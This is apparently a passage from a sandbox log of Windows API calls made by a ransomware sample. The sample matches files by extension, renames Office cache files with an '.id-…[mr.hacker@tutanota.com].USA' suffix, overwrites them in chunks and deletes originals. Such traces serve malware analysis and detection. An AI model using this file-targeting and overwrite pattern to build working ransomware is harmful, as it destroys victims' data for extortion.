lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.315] lstrlenW (lpString=".jpg") returned 4 [0040.315] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.315] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0040.315] lstrlenW (lpString="Proof.cab") returned 9 [0040.316] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.316] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=11482605) returned 1 [0040.316] CloseHandle (hObject=0x1b0) returned 1 [0040.316] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0040.316] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.316] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0040.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.593] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.593] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.594] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.598] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.598] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.602] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.602] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.602] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.617] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.617] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0040.991] SetEndOfFile (hFile=0x1b0) returned 1 [0040.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0040.991] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.991] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.992] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.992] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.994] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.994] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.996] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0040.996] CloseHandle (hObject=0x1b0) returned 1 [0043.031] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0043.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.031] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".doc") returned 4 [0043.032] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString=".docx") returned 5 [0043.032] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.032] lstrlenW (lpString=".pdf") returned 4 [0043.032] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString=".xls") returned 4 [0043.032] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString=".xlsx") returned 5 [0043.032] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.032] lstrlenW (lpString=".ppt") returned 4 [0043.032] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".zip") returned 4 [0043.032] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString=".rar") returned 4 [0043.032] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString=".bz2") returned 4 [0043.032] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.032] lstrlenW (lpString=".7z") returned 3 [0043.032] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".dbf") returned 4 [0043.032] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".1cd") returned 4 [0043.032] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".jpg") returned 4 [0043.032] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.032] lstrlenW (lpString=".doc") returned 4 [0043.032] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString=".docx") returned 5 [0043.033] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.033] lstrlenW (lpString=".pdf") returned 4 [0043.033] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString=".xls") returned 4 [0043.033] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString=".xlsx") returned 5 [0043.033] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.033] lstrlenW (lpString=".ppt") returned 4 [0043.033] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.033] lstrlenW (lpString=".zip") returned 4 [0043.033] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString=".rar") returned 4 [0043.033] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString=".bz2") returned 4 [0043.033] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.033] lstrlenW (lpString=".7z") returned 3 [0043.033] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.033] lstrlenW (lpString=".dbf") returned 4 [0043.033] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.033] lstrlenW (lpString=".1cd") returned 4 [0043.033] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.033] lstrlenW (lpString=".jpg") returned 4 [0043.033] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.033] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0043.033] lstrlenW (lpString="Office32MUI.msi") returned 15 [0043.033] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0043.034] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=873984) returned 1 [0043.034] CloseHandle (hObject=0x1b0) returned 1 [0043.034] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0043.034] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0043.034] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0043.034] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.034] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.034] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0043.035] GetLastError () returned 0x0 [0043.035] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xd5600, lpOverlapped=0x0) returned 1 [0043.542] WriteFile (in: hFile=0x208, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xd5610, lpOverlapped=0x0) returned 1 [0043.559] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.559] WriteFile (in: hFile=0x208, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0043.559] SetEndOfFile (hFile=0x208) returned 1 [0043.559] CloseHandle (hObject=0x208) returned 1 [0043.566] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.566] SetEndOfFile (hFile=0x1b0) returned 1 [0044.415] CloseHandle (hObject=0x1b0) returned 1 [0044.415] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0044.415] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString=".doc") returned 4 [0044.416] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.416] lstrlenW (lpString=".docx") returned 5 [0044.416] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.416] lstrlenW (lpString=".pdf") returned 4 [0044.416] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.416] lstrlenW (lpString=".xls") returned 4 [0044.416] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.416] lstrlenW (lpString=".xlsx") returned 5 [0044.416] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.416] lstrlenW (lpString=".ppt") returned 4 [0044.416] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString=".zip") returned 4 [0044.416] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.416] lstrlenW (lpString=".rar") returned 4 [0044.416] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.416] lstrlenW (lpString=".bz2") returned 4 [0044.416] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.416] lstrlenW (lpString=".7z") returned 3 [0044.416] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString=".dbf") returned 4 [0044.416] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString=".1cd") returned 4 [0044.416] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.416] lstrlenW (lpString=".jpg") returned 4 [0044.417] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString=".doc") returned 4 [0044.417] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.417] lstrlenW (lpString=".docx") returned 5 [0044.417] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.417] lstrlenW (lpString=".pdf") returned 4 [0044.417] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.417] lstrlenW (lpString=".xls") returned 4 [0044.417] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.417] lstrlenW (lpString=".xlsx") returned 5 [0044.417] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.417] lstrlenW (lpString=".ppt") returned 4 [0044.417] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString=".zip") returned 4 [0044.417] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.417] lstrlenW (lpString=".rar") returned 4 [0044.417] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.417] lstrlenW (lpString=".bz2") returned 4 [0044.417] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.417] lstrlenW (lpString=".7z") returned 3 [0044.417] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString=".dbf") returned 4 [0044.417] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString=".1cd") returned 4 [0044.417] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.417] lstrlenW (lpString=".jpg") returned 4 [0044.417] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.418] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0044.418] lstrlenW (lpString="InfLR.cab") returned 9 [0044.418] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.418] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=18874884) returned 1 [0044.418] CloseHandle (hObject=0x1b0) returned 1 [0044.418] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0044.418] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.418] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0044.419] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.419] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.419] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.419] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.436] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.436] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.461] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.461] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.461] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.478] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.478] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0044.680] SetEndOfFile (hFile=0x1b0) returned 1 [0044.680] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0044.680] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.680] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.682] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.682] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.685] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.685] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.689] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0044.689] CloseHandle (hObject=0x1b0) returned 1 [0047.005] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 